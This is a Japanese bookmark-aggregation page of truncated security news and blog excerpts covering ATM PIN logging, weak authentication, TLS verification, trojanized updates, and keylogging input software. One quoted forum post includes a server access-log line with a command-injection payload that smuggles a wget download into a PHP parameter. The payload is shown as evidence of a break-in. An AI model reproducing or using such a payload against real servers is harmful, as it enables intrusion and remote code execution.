暗証番号をログに吐くとかあり得なさすぎて卒倒した - novtan別館
新人の頃からしばらくやっていた仕事も暗証番号の流れるものだったけどさあ…ログに吐くとかないよなーって。でも勘定系を直接触っていたわけじゃないのでそっちで吐いてたかも知れないけど、少なくとも僕の携わっていた部分ではこのような話は徹底されていたからな。 NTTデータは千数百台ある横浜銀行ATM(富士通製)にそれぞれ蓄積される「解析用ログ」を、NTTデータが運用するサーバーに集約した後、MOディスク(光磁気ディスク)で富士通フロンテックへと渡していた。集約や受け渡しの過程においては解析用ログは暗号化されており、解読は不可能だという 富士通フロンテックは保守管理業務の一環として、ATMの故障時の調査目的などで解析用ログを復号して利用している。容疑者はこの復号後の口座番号・暗証番号を元に偽造カードを作成、不正出金を繰り返していたという。 「対策を打つ前にやられた」、NTTデータが横浜銀行データ不正取
パスワード認証はもはや過去の遺物にするべき - 狐の王国
『完全にお前たちに責任がある』JALマイレージ不正アクセス判明に高木浩光先生が憤激という記事。 JALの顧客向けサイトの認証が数字のIDと数字のパスワードだけで案の定不正アクセスを許し、顧客のマイレージポイントが盗まれた事件についての話なのだが、憤激もうなずける内容ではある。 今後金融関係のウェブサービスが拡充していく流れはすでに米国などでも始まっており、こうした認証に関わるセキュリティ問題は今後増加することになるだろう。 ただ正直言うと、こうしてしまいたくなる気持ちもわかる。なんせパスワードというのはたいへん面倒な代物で、アルファベットの大文字小文字混在で記号と数字も混ぜて8文字以上、なんてのが基準になってたりする。そんなもん覚えていられる人はそうそういない。 プログラマみたいな連中は1日何度もパスワードを入力する場面に遭遇するし、そのたびに入力してると指が覚えるので割と数種類のパスワー
サービス終了のお知らせ - NAVER まとめ
サービス終了のお知らせ NAVERまとめは2020年9月30日をもちましてサービス終了いたしました。 約11年間、NAVERまとめをご利用・ご愛顧いただき誠にありがとうございました。
SSL証明書検証エラーの警告を無視しないほうがいいたった1つの理由
こんにちは。CTOの馬場です。 昨日のエントリ RHEL5/CentOS5でGlobalSignのルート証明書が有効期限切れで大騒ぎ で暫定回避策として「接続先のSSL証明書を検証しないようにする」と書いたのですが、そのリスクについてもっと伝えたほうがよさそうなので追加のエントリです。 ( @nekoruri さんご指摘ありがとうございます!) いきなり結論から書きますが、 SSL証明書の警告無視はSSLの目的の1つである「通信相手の認証」を無効にするのでヤバい のです。 つまり証明書検証エラーを無視すると、通信は暗号化しているけど通信相手は誰かわからない、というトンチンカンな状況になります。 なので、トンチンカンな状況が許せる時だけにしましょう。 実はHTTPでいいんだけどなんとなく通信は暗号化しておきたいときとか、リスク覚悟で通信したいときとか... なお、技術的な説明は以下のページが
SSL/TLSライブラリの正しい使い方(もしくは、コモンネームの検証について)
スマホアプリの市場拡大に伴い、直接SSL/TLSライブラリを使用するプログラムを書く機会も増えてきている今日この頃かと思います。 SSL/TLSライブラリを使う際には、接続確立時にサーバの認証を正しく行う必要があります。具体的には、クライアントプログラムで以下の2種類の検証を行うことになります。 SSL/TLSライブラリがサーバの証明書の検証に成功したこと サーバの証明書に含まれるコモンネーム注1が接続しようとしたサーバと同一であること 前者については、OpenSSLの場合はSSL_CTX_set_verifyの引数にSSL_VERIFY_PEERを指定するなどして、ライブラリ側で処理を行わせることが可能です(証明書の検証に失敗した場合はSSL_connectがエラーを返します)。 一方、後者についてはSSL/TLSライブラリによって差があり、検証機能を有効にするために特別な呼出が必要だっ
BookLiveが採用したサイファーテックDRMの技術の甘さを実証してみた - Windows 2000 Blog
3rdに引っ越しました。 2010/12/31 以前&2023/1/1 以降の記事を開くと5秒後にリダイレクトされます。 普段の日記は あっち[http://thyrving.livedoor.biz/] こちらには技術関係のちょっとマニアックな記事やニュースを載せます。 Windows2000ネタ中心に毎日更新。 LiveBookなどで採用されているサイファー テックの自称 DRM技術ですが。 アイデア商品ってことに理解を示しつつも、2年前にひどい技術ということで改善されたらいいなという記事を書いたんですが、全く改善がみられないようなので簡単に実際にハッキングできるか実験してみました。 まずこの文字列を元に解析してみると %COMMONPROGRAMFILES%\CypherTec\cgrdcore32.dllが処理をしてるのが分かったよ このDLLを利用して制御してるのが Cypher
正規のソフトウェアのアップデートで、不正なプログラムが実行される事案について | セキュリティ対策のラック
当社の緊急対応チーム『サイバー救急センター』は、標的型攻撃に関する調査を行う過程で、正規のソフトウェアのアップデートを装いコンピューターウイルスに感染させる、複数の事案を確認しました。本件は当社が2013年10月9日に発表した「日本でも発生した『水飲み場型攻撃』に対して注意喚起」とは異なる、新しい標的型攻撃の手口と捉えています。 本注意喚起情報は、当該ソフトウェアを使用しているお客様が、本事案の悪影響を受けていないかを確認する方法をお伝えするために公開いたします。また、今後、企業内で使用している正規ソフトウェアのアップデートにおいて同様の仕掛けがなされる危険性もあり、あわせて注意喚起するものです。 2014/03/10 更新 本注意喚起情報を多くの皆様にご覧いただき、また100件を超える電子メールおよびお電話でのお問い合わせをいただました。情報を発信した企業としての責任として、お問い合わせ
艦隊これくしょんの通信がとてもじゃないけど見てられない
その文字列検索、std::string::findだけで大丈夫ですか?【Sapporo.cpp 第8回勉強会(2014.12.27)】Hiro H.
【速報】torrentアニメのtsファイルの出元が判明
1 :番組の途中ですがアフィサイトへの転載は禁止です:2014/01/17(金) 19:41:56.03 ID:LOQGxUho0 ?2BP(1919) ソース 45 名前:login:Penguin:2014/01/16(木) 20:45:36.60 ID:TMxEKoMu うわ最悪、epgrecに変なファイル置かれた…。 パスワード認証もかけてたんだけどどこから入ったんだろう…。 46 名前:login:Penguin:2014/01/16(木) 21:00:58.77 ID:TMxEKoMu と思ったらドメイン経由だとかかってたけどIPアドレス直打ちだとかかってなかった 87.181.247.107 - - [12/Jan/2014:17:51:44 +0900] "GET /epgrec/install/step5.php?script=;wget%20-4%20-O%20/hom
「LINEウイルス」の正体とは―LINE内で流行する「ウイルス攻撃」の現状について
LINE周りで「ウイルスを送るぞ」という表現をよく見かけます。そして、「LINEにもウイルスがあるの?」と疑問に思ったり不安に思っている人も多数発生しています。今回は、LINEで広まりつつある「LINEウイルス」の正体と、「LINEウイルス」と呼ばれるものを使った攻撃の実態について紹介します。 @NAVER_LINE LINEのグループでウイルス送りつけるって言われたんですが送れるんですか?— yoshiaki (@yoshiak48538031) August 27, 2013 LINEでなんかウイルスを送り込む輩がいるって聞いたけど、ほんとなの?— Torm@サブアカ (@torm1998) August 23, 2013 LINEで言われている「ウイルス」について気になっている人は多いようです。 目次 1. 「LINEウイルス」の特徴2. 「LINEウイルス」に関するTweet2.1
中国製の日本語入力ソフト 入力情報を無断送信 NHKニュース
中国最大手の検索サイト「百度(バイドゥ)」が提供する日本語の入力ソフトが、パソコンに打ち込まれたほぼすべての情報を、利用者に無断で外部に送信していたことが分かりました。 セキュリティー会社は、機密情報が漏えいするおそれもあるとして、利用には注意が必要だと指摘しています。 アメリカのグーグルに次いで世界2位の検索サイト、中国の「百度」は、4年前から「Baidu IME(バイドゥ・アイエムイー)」という日本語の入力ソフトを無償で提供していて、おととしまでに180万回ダウンロードされるなど、利用が広がっています。 このソフトは、初期設定ではパソコンの情報を外部に送信しないと表示していますが、セキュリティー会社のネットエージェントなどが分析したところ、実際には国内にある百度のサーバーに情報を送信していることが分かりました。送っている内容は、利用者がパソコンで打ち込んだほぼすべての情報と、パソコン固
間違いだらけのSQL識別子エスケープ
これから3回連載の予定で、SQL識別子のエスケープの問題について記事を書きます。SQL識別子のエスケープについてはあまり解説記事などがなく、エンジニア間で十分な合意がないような気がしますので、これらの記事が議論のきっかけになれば幸いです。 3回の予定は以下のとおりです。 間違いだらけのSQL識別子エスケープ(本稿) SQL識別子エスケープのバグの事例 SQL識別子は結局どうすればよいか ということで、まずはSQL識別子のエスケープの失敗例について説明します。この失敗例はあくまで説明のために作ったもので、実際のものではありません。また、想定が「ありえない」と思われるかもしれませんが、意図的なものですのでご容赦いただければと思います。また、「間違いだらけの」というタイトルは、今回の題材が間違いだらけという意味であり、巷のSQL呼び出しがそうであるという意味ではありません。本稿に登場する人物と団
パソコンの電源鳴きから4096ビットのRSA秘密鍵が解析される | スラド セキュリティ
イスラエル・テルアビブ大学の研究チームが、GnuPGが暗号文を処理する際に変化するパソコンの「電源鳴き」を取り込んで処理することで、4096ビットのRSA秘密鍵を1時間以内に解析できたそうだ(RSA Key Extraction via Low-Bandwidth Acoustic Cryptanalysis、 論文PDF、 Hack a Dayの記事、 本家/.)。 多くのCPUでは与える命令や結果によって消費電力、発熱、発するノイズなどが変化し、これを観察することで実行中の命令やデータを外部から推測することができる(サイドチャネル攻撃と呼ばれる)。通常この攻撃はスマートカードや小さなセキュリティチップなどに対して行われるが、このチームでは過去に処理するRSAキーによってPCの発する音が変化することを発見していた。 今回の実験では主に高感度マイクを標的PCの排気口に向け、アンプやデータ収
手数料無料・無審査・放置のクラウドファンドFreeStarterを作りました。:村上福之の「ネットとケータイと俺様」:オルタナティブ・ブログ
手数料無料・無審査・放置のクラウドファンドFreeStarterを作りました。さみしいので何か投稿してください。借金を抱えた妊婦の出産費用でも、重病にかかった子供の治療費でも、サラ金ブラックリストな人のパチンコ代でも、なんでもファンディングできます。 ・手数料無料で無審査で放置のクラウドファンドです。 ・審査をしないので3分でクラウドファンドが公開されます。 ・銀行振り込みまたはクレジットカードを使います。 ・スマホでもクラウドファンドを作れます。 トップページです。bootstrapのまんまです。 入力項目はこれだけです。3分もかかりません。 入力すると、確認画面も審査も何もなくいきなり公開されます。Youtube動画を貼り付けられます。 勝手に案件ごとにハッシュタグを割り振るので、振り込んだら、勝手にツィートしてください。 bootstrapなので、レスポンシブナントカなのでスマホでも
Googleドメイン用の不正証明書が発行される、各社が失効措置へ
「google.com」「.google.co.jp」などのドメイン用の不正証明書が発行されていたことが分かり、Google、Microsoft、Mozillaが対応を表明した。 米Googleは12月7日、同社傘下の複数のドメイン用に不正なデジタル証明書が発行されていたことが分かり、問題の証明書を失効させるなどの措置を講じたことを明らかにした。Googleから連絡を受けたMicrosoftやMozillaも対応を表明した。 Googleによると、不正な証明書は12月3日に発見され、調べたところ、フランスの政府系認証局ANSSI傘下の中間認証局で発行されていたことが分かった。 電子証明書は、ユーザーがアクセスしているWebサイトが本物であることを確認するために使われる。不正な証明書を利用すれば、偽サイトであってもWebブラウザの警告が表示されず、ユーザーがだまされて個人情報などを入力してし
NICTが脆弱なSSLサーバの検出システム「XPIA」を開発、分布を特定
NICTが脆弱なSSLサーバの検出システム「XPIA」を開発、分布を特定:「共通の秘密鍵」を生み出さない、適切な乱数生成モジュールの利用を 情報通信研究機構(NICT)は2013年10月22日、Secure Socket Layer(SSL)の脆弱性を検証するシステム「XPIA」を開発したことを明らかにした。 情報通信研究機構(NICT)は2013年10月22日、Secure Socket Layer(SSL)の脆弱性を検証するシステム「X.509 certificate Public-key Investigation and Analysis system(XPIA)」を開発したことを明らかにした。 XPIAは、SSLサーバが暗号化通信に利用しているX.509電子証明書からRSA公開鍵の情報を抽出し、脆弱性が存在しないかどうかを検証するシステムだ。XPIAでは、共通の秘密鍵を有しており
HTTPSを使ってもCookieの改変は防げないことを実験で試してみた
寺田さんのブログエントリ「他人のCookieを操作する」には、通信路上の攻撃者がいる場合は、SSLを使っても、Cookieの盗聴を防ぐことはできるが、Cookieの改変を防ぐことはできないと指摘されています。いかにも寺田さんらしい簡にして要を得たエントリで、これに付け加えることはあまりないのですが、残念ながらまだ読んでいない人が多そうだと言うことと、より広い読者に向けて具体的に説明した方がよいだろうと考えました。 そこで、通信路上に攻撃者がいる典型例として、公衆無線LANの偽AP(アクセスポイント)があるケースを題材として、「HTTPSを使ってもCookieの改変は防げない」ことを説明します(Secure属性使うと盗聴は防げますが、改変は防げません)。長いエントリなので結論を先に書いておきます。 Secure属性がないCookieはHTTPSでも盗聴できる Cookieの改変についてはSe
米英の情報機関 ネット暗号解読か NHKニュース
アメリカの新聞ニューヨーク・タイムズは、アメリカとイギリスの情報機関が、インターネット上で広く使われている暗号の解読に成功し、銀行の決済や、医療記録などの個人情報をひそかに収集していると伝えました。 これは、アメリカの新聞ニューヨーク・タイムズが、CIA=中央情報局の元職員スノーデン容疑者から提供された文書を基に伝えたものです。 それによりますと、アメリカのNSA=国家安全保障局が、スーパーコンピューターによる解析によって、インターネット上で広く使われている暗号の解読に成功し、銀行の決済や個人の医療記録、さらに電子メールなどの個人情報をひそかに収集しているということです。 また、こうした個人情報の収集を巡っては、イギリスの情報機関が、一部のIT企業の協力を得ていたとも伝えています。 暗号解読の機密計画は、アメリカの南北戦争における戦いの場所の1つから「ブルラン」と名付けられており、イギリス
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
クレジットカード番号 : 続・ユビキタスの街角
総務省、国民が悪性サイトにアクセスしようとしたら注意画面を表示 